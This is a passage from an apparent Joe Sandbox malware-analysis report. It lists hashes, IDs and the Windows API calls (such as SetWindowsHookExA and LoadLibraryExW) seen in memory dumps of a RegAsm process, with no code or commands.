                              • Opcode Fuzzy Hash: 614e5079dac032b12072e6ae5c751eb442883387598f04bc8e323a9bfe63cf0a
                              • Instruction Fuzzy Hash: 9B516E30F002089FEB559FB9C854BAEBAF7BF88700F208529D545AB395DE719C058B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(00000000), ref: 062FF5B6
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: f0b0ba4777b0359793e9bcc48e4f244f0abd860c059408d54c35b3192d4bbb51
                              • Instruction ID: 018b815bd65e04e2f24575923511e95f28b0ff89ee0ece271009f3db1d148783
                              • Opcode Fuzzy Hash: f0b0ba4777b0359793e9bcc48e4f244f0abd860c059408d54c35b3192d4bbb51
                              • Instruction Fuzzy Hash: 19814570A20B458FD7A4DF29D64475ABBF1BF88304F00892DDA86D7A50D774E845CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2902789579.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_2820000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8aa0744dae9dc7667dfea576359ab0e6373ded8d3e8093e805636f5e67d1b51b
                              • Instruction ID: 78282699045d0ea08251d4b6a10d092c63e5f24635b82db7611eb565ef14d382
                              • Opcode Fuzzy Hash: 8aa0744dae9dc7667dfea576359ab0e6373ded8d3e8093e805636f5e67d1b51b
                              • Instruction Fuzzy Hash: 8E412436D043999FCB14DFB9D8042AEBBF1AF89310F14856BD948E7241EB749885CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 062F30B3
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID: HookWindows
                              • String ID:
                              • API String ID: 2559412058-0
                              • Opcode ID: 274f4c176f626d078c0307244c12439abe45e9c4113b18570b26be121cbfec1e
                              • Instruction ID: a1957e1dd92474970891a9dfbec8603d703dae1b0db6e6925747512d87e170d3
                              • Opcode Fuzzy Hash: 274f4c176f626d078c0307244c12439abe45e9c4113b18570b26be121cbfec1e
                              • Instruction Fuzzy Hash: 633122329043489FC711DF78D844AAEFBF1EF85310F14886ED4999B350CB34A954CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 062F7117
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 88a5907ac34fff1c5f061da2ea2891b688323d5deea35251ac7abf6a3820db70
                              • Instruction ID: d2c25d52fa6b69cc6bc55d302c33642e0795dc99c72be6ac0bf3546a41057d82
                              • Opcode Fuzzy Hash: 88a5907ac34fff1c5f061da2ea2891b688323d5deea35251ac7abf6a3820db70
                              • Instruction Fuzzy Hash: 4A21E4B59002599FDB10CFAAD984ADEFBF4EB48324F14842AE954A7310C378A944CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 062F30B3
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID: HookWindows
                              • String ID:
                              • API String ID: 2559412058-0
                              • Opcode ID: a886252b9b87caf60425d11a2d1a82487fa29df16688bd8660796584d56c383b
                              • Instruction ID: 9d237760e476ab807485c4d055268a8e4e983bb40e2e76e91244b8561b855bc7
                              • Opcode Fuzzy Hash: a886252b9b87caf60425d11a2d1a82487fa29df16688bd8660796584d56c383b
                              • Instruction Fuzzy Hash: 662107B5D142499FCB54CFAAC844BEEFBF4AF88320F14842ED499A7250C774A944CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 062F7117
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 50ab44a953ec05f2b862df5da141d3392b94f057edefc14beebc37b591edaa68
                              • Instruction ID: b75c46a54011fd382d2bfe9749f1c32b39b8b0092f1e32645f8141b5e70539fc
                              • Opcode Fuzzy Hash: 50ab44a953ec05f2b862df5da141d3392b94f057edefc14beebc37b591edaa68
                              • Instruction Fuzzy Hash: 1421E4B59002599FDB10CFA9D984ADEFBF4EB48314F14842AE954A7210C378A944CF64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 062F30B3
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID: HookWindows
                              • String ID:
                              • API String ID: 2559412058-0
                              • Opcode ID: d15ab6a04dc22514be8cb61789322f4e387afe215c137ef265b22b42f9a79d96
                              • Instruction ID: 892ff7ef2e219329ec88f506fbd388fc0c6ea92fbb261c425185842b3f5613a1
                              • Opcode Fuzzy Hash: d15ab6a04dc22514be8cb61789322f4e387afe215c137ef265b22b42f9a79d96
                              • Instruction Fuzzy Hash: 712124B5D102099FCB54CF9AC844BEEFBF4AB88320F14842AD459A7250C7B4A944CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,062FF631,00000800,00000000,00000000), ref: 062FF822
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 7c5fbdbead308b651e37a02774e77336ef8bc09a814c73217563e4f362d7fe54
                              • Instruction ID: 0509808a3c04a3d356d60f617ed2093c2b77c8e9f4918b7ac2309d7874f8a0f2
                              • Opcode Fuzzy Hash: 7c5fbdbead308b651e37a02774e77336ef8bc09a814c73217563e4f362d7fe54
                              • Instruction Fuzzy Hash: 371126B6D103499FDB10CF9AC544ADEFBF4EB48710F14842AD919A7210C375A945CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,062FF631,00000800,00000000,00000000), ref: 062FF822
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 9f0cb330558ec596f504d2326cc22be2c37a94d49b575382aedd639cfc217df2
                              • Instruction ID: 136eca4b7d69a7195a09daf591e97c94ff3d6840465ff54cf6bc23d98e12e8db
                              • Opcode Fuzzy Hash: 9f0cb330558ec596f504d2326cc22be2c37a94d49b575382aedd639cfc217df2
                              • Instruction Fuzzy Hash: 9C1167B6C102498FDB10CFAAD544ADEFBF4EB48310F14842AD919A7310C374A545CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GlobalMemoryStatusEx.KERNEL32 ref: 0282E877
                              Memory Dump Source
                              • Source File: 00000002.00000002.2902789579.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_2820000_RegAsm.jbxd
                              Similarity
                              • API ID: GlobalMemoryStatus
                              • String ID:
                              • API String ID: 1890195054-0
                              • Opcode ID: 360fe128c30f4246f32ceeb77e4edd3742ffab8b8b926052590565fcf21f4223
                              • Instruction ID: 9e2b1b5eb4f2e03e70fe3dd90595c94f04db481acf758ba50003674ecbeb39f5
                              • Opcode Fuzzy Hash: 360fe128c30f4246f32ceeb77e4edd3742ffab8b8b926052590565fcf21f4223
                              • Instruction Fuzzy Hash: D31123B5C006699BCB10CF9AC544BDEFBF4AF48324F14816AD818B7250D378A984CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(00000000), ref: 062FF5B6
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: ab8d49b1142e933f405ef5b7429a749cfce410dfb27c7be56f9490c31b4aa608
                              • Instruction ID: 3dd16663dbd9de86c148d2f837b1ec9120c0b443f766e737fec04c33877cc502
                              • Opcode Fuzzy Hash: ab8d49b1142e933f405ef5b7429a749cfce410dfb27c7be56f9490c31b4aa608
                              • Instruction Fuzzy Hash: 451110B6C002498FDB10CF9AC944ADEFBF4AB88324F14C42AD929B7210C378A545CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: PH^q
                              • API String ID: 0-2549759414
                              • Opcode ID: 46cad070ad8040199b8139ac3478ce13f5aa7262bce8597e2ac9b4154d08f265
                              • Instruction ID: fcd5d44e0df6d5359844d6e7e90d5e44f27cbb11cc9b8b49b4a6c31d57f92a61
                              • Opcode Fuzzy Hash: 46cad070ad8040199b8139ac3478ce13f5aa7262bce8597e2ac9b4154d08f265
                              • Instruction Fuzzy Hash: 90419270E007499FDF59DF65C45469EBBB2FF86300F204929D446EB240DB71E94ACB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: PH^q
                              • API String ID: 0-2549759414
                              • Opcode ID: be0c9827acff57adf8296aa8e7ab48d62cb63b0544e09646f5bff79ad1c016e3
                              • Instruction ID: 9fd57cd0d6759cfc069870101f9e0121fd65661817644054a1ca891997d927c3
                              • Opcode Fuzzy Hash: be0c9827acff57adf8296aa8e7ab48d62cb63b0544e09646f5bff79ad1c016e3
                              • Instruction Fuzzy Hash: 0D31B030B002059FDB99AB74D55466F7AE3AB89700F204979D406DF384EE35DD8ACBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q
                              • API String ID: 0-388095546
                              • Opcode ID: 61b26879984c390bc405b820d8e37b7ad9c1af0ca299ac31ebf103890fb7fbfa
                              • Instruction ID: 93d3df376896ee50b0874f4fbee8906bb1cd6035f3dcad8c27614a292261e1c2
                              • Opcode Fuzzy Hash: 61b26879984c390bc405b820d8e37b7ad9c1af0ca299ac31ebf103890fb7fbfa
                              • Instruction Fuzzy Hash: 85F0DC3EB042008FEFAC9A58AD8026CB365EB41311F2C4C66D905CF654C631D90BCBD8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aa6a56eb61cb76d233bcb3c680637def5d6b042ab5cb73e0ebff0adf7011df7a
                              • Instruction ID: c6a871bb1fb5225b55350ac591778264dd32c58c9c0ad967789fc06a5d1c7915
                              • Opcode Fuzzy Hash: aa6a56eb61cb76d233bcb3c680637def5d6b042ab5cb73e0ebff0adf7011df7a
                              • Instruction Fuzzy Hash: 8E813D30B102099FDB58DFB9D85469EB7F2AF89304F208529D40ADF395EB70EC468B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 85fa40a04d563e7f190a0cd4b2c00e2dc49ecd0178549765d8af1108e02a37f4
                              • Instruction ID: 6cd28668f2fba61862b40bbbbdd8b126fc0ce44ce9ea1d3a20f2b22caf34ff07
                              • Opcode Fuzzy Hash: 85fa40a04d563e7f190a0cd4b2c00e2dc49ecd0178549765d8af1108e02a37f4
                              • Instruction Fuzzy Hash: 0961B071F000214FDF149BBEC89466FAAD7AFC5610B25443AD80EDB364EEA6DD0287C6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c9ba7f3a75a2577706fb784da97d8b6cecb9f2476877d3e4237d6de458b1286
                              • Instruction ID: 0ed6f6bf6379588a71d8d24fd2614362e422b86e98255ad6a91c24cfaf3af87b
                              • Opcode Fuzzy Hash: 2c9ba7f3a75a2577706fb784da97d8b6cecb9f2476877d3e4237d6de458b1286
                              • Instruction Fuzzy Hash: 2C916C34E002198FDF64DF68C890B9DB7B1FF89304F208699D549AB395DB70AA85CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5252477ce2ce77ebd463908cf081bdea4b076a6102bac72a8b1e45a183e0402e
                              • Instruction ID: 31fd9b7a8e10d4861e4517c79756a4c356cc8a91d7559fb3bee0596dfee3816e
                              • Opcode Fuzzy Hash: 5252477ce2ce77ebd463908cf081bdea4b076a6102bac72a8b1e45a183e0402e
                              • Instruction Fuzzy Hash: 2E915E34E102198BDF64DF68C880B9DB7B1FF89304F208599D549BB355DB70AA85CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 049cedfb5da67d513217c93e1b6ee110c5b625a31cd83c920abf46525a4f4cef
                              • Instruction ID: ffd44c950f834b2b3f23dd6aa2f5c69742f29f5113409877c4282c44eda35b7a
                              • Opcode Fuzzy Hash: 049cedfb5da67d513217c93e1b6ee110c5b625a31cd83c920abf46525a4f4cef
                              • Instruction Fuzzy Hash: 69713E34E002099FDB58DFA9D980A9EBBF6FF84310F248569D406EB355DB31E946CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb9b3583fecfb8be7e6c3734b55f3ae85b83bcda6b0524cfe16ef7bc0468cc71
                              • Instruction ID: ecd7928c2981eb5c5042fc16f5c5a4bff899283ec5da2e79803998ec0407f950
                              • Opcode Fuzzy Hash: bb9b3583fecfb8be7e6c3734b55f3ae85b83bcda6b0524cfe16ef7bc0468cc71
                              • Instruction Fuzzy Hash: D2712C34A002099FDB58DFA9D980A9EBBF6FF88304F248469D405DB355DB31ED46CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cd6d08a74962346b6fdba9c19ba4dff4b05e65e7a43e241cff5906a2232ae7ef
                              • Instruction ID: c969ce2eb6560562b37b2336ed87b83978b5b657edd298e2f2738bc04bf6549e
                              • Opcode Fuzzy Hash: cd6d08a74962346b6fdba9c19ba4dff4b05e65e7a43e241cff5906a2232ae7ef
                              • Instruction Fuzzy Hash: 7451DF31E001059FDB28AB78E4486ADBBF2EF89315F20886EE106DB251DB359959CBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 380ded7443634222b028a4d454432fea16bab2a45a8d57c1aac2288845139d96
                              • Instruction ID: 0b776ea7c99cb285f4a98ecda5955d3a8481c076801c60ca04ab4bb89c9c81d8
                              • Opcode Fuzzy Hash: 380ded7443634222b028a4d454432fea16bab2a45a8d57c1aac2288845139d96
                              • Instruction Fuzzy Hash: 9D51D870F106189FEF68567CD95477E36DBDB89310F20482ED50ADB398CA29CC8997D2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 29a4e8dacb389bd5841a074c1e1a0b1dc3eafa78b8e7ffd264c8adc9bec34dda
                              • Instruction ID: 643343200268de529c485f9507dd77d575d34c5ba9c9ed61ae158e6be6abb0cf
                              • Opcode Fuzzy Hash: 29a4e8dacb389bd5841a074c1e1a0b1dc3eafa78b8e7ffd264c8adc9bec34dda
                              • Instruction Fuzzy Hash: 2451E670F106189FFF68666CD95473F369EDB89310F20482DD50ADB398CA29CC8957D2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5d1dd2a3f0680ac3bed4d60de30a9f7b8bf71e874f08c4eb44aef3bdcef3c74f
                              • Instruction ID: 7d2d05c277f881525164ae5b727628e5f010a2a297cdc648d65477aff825b9e2
                              • Opcode Fuzzy Hash: 5d1dd2a3f0680ac3bed4d60de30a9f7b8bf71e874f08c4eb44aef3bdcef3c74f
                              • Instruction Fuzzy Hash: F54172B1E006098FDB74CF99D880AAFFBB6EB85320F10492AD156DB650D730E9598BD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 742e0ee44088c96d5519d0936927242c3157e65e18ebf33e866f81f3d6537d61
                              • Instruction ID: 0f45b8e121e251d61ef48ab795551e5826b27b5761aa7add55979fe81c09cc59
                              • Opcode Fuzzy Hash: 742e0ee44088c96d5519d0936927242c3157e65e18ebf33e866f81f3d6537d61
                              • Instruction Fuzzy Hash: 61318134E0160A9FDB59DFA4D85469EB7B2FF89300F108529E906EB740DB71A986CBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3a3fed33ec9d9c027e67aedfd971a91627f0c3032835760b35f1dcc0be80d2ee
                              • Instruction ID: a64cd678e85d89d8e1dc66662025526d04fac6cfb16faaf05017260eec49e4d5
                              • Opcode Fuzzy Hash: 3a3fed33ec9d9c027e67aedfd971a91627f0c3032835760b35f1dcc0be80d2ee
                              • Instruction Fuzzy Hash: 5031C330E1464A8FDF25CF78D58469EBBB1EF86304F148929D445AB345EB70E94ACB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 285503b5256bb3501695135e913ce86567dac03ad51cedfb43c9bdaf03ca2365
                              • Instruction ID: 7511ef2440e0427278238a5354d394eb733ddfd35e58afd76c6d59f3a3e4ac25
                              • Opcode Fuzzy Hash: 285503b5256bb3501695135e913ce86567dac03ad51cedfb43c9bdaf03ca2365
                              • Instruction Fuzzy Hash: 8A318030E106099FDB59DFA4D85469FB7B2FF89300F108529E906EB340DB71AD86CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8cf3227de44d47dcbf63fee369cf7204e9e89974f52df94a3c3b17add32ff5eb
                              • Instruction ID: 88cbdc3cae50758c527ddb7c2110c7360c9d93eaf45ebd888565a2f11f65ab84
                              • Opcode Fuzzy Hash: 8cf3227de44d47dcbf63fee369cf7204e9e89974f52df94a3c3b17add32ff5eb
                              • Instruction Fuzzy Hash: BC21B1B1D102058FDF658B69C4C0A6EFBB2EB85320F64892AD059DF281C235E945CBD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 42703c05b97638599726100158d2d463ee1f16055c305d4935213ace157e295b
                              • Instruction ID: e17efc8c3e66401d1470f09c342bd7e1e1ca6dd1b8f544d1caa25f9da992b305
                              • Opcode Fuzzy Hash: 42703c05b97638599726100158d2d463ee1f16055c305d4935213ace157e295b
                              • Instruction Fuzzy Hash: 0D219175F056159FEB14DF78E940AAEBBF5EB48710F108025E905EB344EB30D8868BE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4aa31f35d8f39782f72a3661aea680c207bb0cddabf31380d20f35023389fc48
                              • Instruction ID: 34f63fd07d8c9cc05168c19705de63de74d11f0204ceabc1d86e07fed4c50673
                              • Opcode Fuzzy Hash: 4aa31f35d8f39782f72a3661aea680c207bb0cddabf31380d20f35023389fc48
                              • Instruction Fuzzy Hash: C7219C75F046159FEB44DF68E980AAEBBF5EB48710F108029E906EB384EB30D9418B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2900835221.000000000265D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0265D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_265d000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 442b27267c6c35453f3ce94e78a3e3f87b34a3e22ff020f6d7b1b97a11dfbf08
                              • Instruction ID: d30659aadf801cd61ade2067d06bf44df6bd5801340a0584cb49cef4d4c11714
                              • Opcode Fuzzy Hash: 442b27267c6c35453f3ce94e78a3e3f87b34a3e22ff020f6d7b1b97a11dfbf08
                              • Instruction Fuzzy Hash: C5210175604204DFDB28DF14D9C0B26BBA5EB88318F24C5ADEC0A4B396C33AD846CA61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f4c8d88ccc0c96e9b1e7bc558bda2765cf8d06ee8067bef64aaf72d5cb338682
                              • Instruction ID: 3a1c5c1bd6b08d0178db7cec97f8c3e979e98a64a76dda5fed27f1853a602c6f
                              • Opcode Fuzzy Hash: f4c8d88ccc0c96e9b1e7bc558bda2765cf8d06ee8067bef64aaf72d5cb338682
                              • Instruction Fuzzy Hash: 48114931B002410FEB65867DA81471BB7DACFC6720F24887EE14ECB741D961DD4687E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 205d9093c9c02f8f694b055fc87126f7bc1959ae9e6c369c3b7389a0a8be663d
                              • Instruction ID: 6229817c4940f35aded67a94c2e5b036910ea09db81151f30f7e9f501b3a79d7
                              • Opcode Fuzzy Hash: 205d9093c9c02f8f694b055fc87126f7bc1959ae9e6c369c3b7389a0a8be663d
                              • Instruction Fuzzy Hash: ED118232F141295FEF589679D8146AE72EAABC8751B008436D90AEB344DE34DC068BD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fe9233e57975e0922be3fa7e85a134f63240c60b896c4afd0caffc3592847879
                              • Instruction ID: e7c5e60a6b03c621e858dbb8d2cb06d2182a0ca36656b6605e86e334de5a8cf6
